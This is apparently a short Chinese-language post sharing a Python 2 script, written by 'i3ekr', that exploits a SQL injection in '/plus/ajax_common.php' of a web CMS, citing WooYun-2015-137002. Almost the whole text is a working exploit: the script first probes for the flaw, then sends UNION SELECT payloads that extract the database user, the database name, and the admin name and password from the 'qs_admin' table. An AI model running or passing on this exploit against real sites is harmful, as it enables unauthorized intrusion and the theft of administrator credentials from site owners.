遇到就瞎写了一个:
1 #!/usr/bin/env python 2 #encoding:utf-8 3 #by i3ekr 4 5 import requests,optparse,re 6 parse = optparse.OptionParser(usage="python %prog url") 7 parse.add_option('-u','--url',dest='url',metavar='urls',help='please input url!!!') 8 parse.set_defaults(v=1.2) 9 options,args=parse.parse_args() 10 url = options.url 11 12 13 def check(url): 14 payload = "/plus/ajax_common.php?query=0%27&act=hotword" 15 html = requests.get(url+payload).content 16 if "Query error" in html: 17 print """[+] 漏洞存在 18 [+] WooYun-2015-137002 19 [+] http://www.anquan.us/static/bugs/wooyun-2015-0137002.html 20 ------------------------------------------------------------- 21 """ 22 else: 23 print "[-] 漏洞不存在" 24 exit() 25 26 27 def attack(url): 28 user = requests.get(url+"/plus/ajax_common.php?query='+and+0+union+select+1,user(),3+and+'&act=hotword").content 29 print "[+] "+user 30 database = requests.get(url+"/plus/ajax_common.php?query='+and+0+union+select+1,database(),3+and+'&act=hotword").content 31 print "[+] "+database 32 username = requests.get(url+"/plus/ajax_common.php?query=0' union select 1,(select admin_name from qs_admin),3 and '&act=hotword").content 33 print "[+] "+username 34 password = requests.get(url+"/plus/ajax_common.php?query=0' union select 1,(select pwd from qs_admin),3 and '&act=hotword").content 35 print "[+] "+password 36 37 def ress(html): 38 res = r"\[\'(.*?)\'\]" 39 ok = re.findall(res,html)[0] 40 print ok 41 42 if __name__ == "__main__": 43 check(url) 44 attack(url)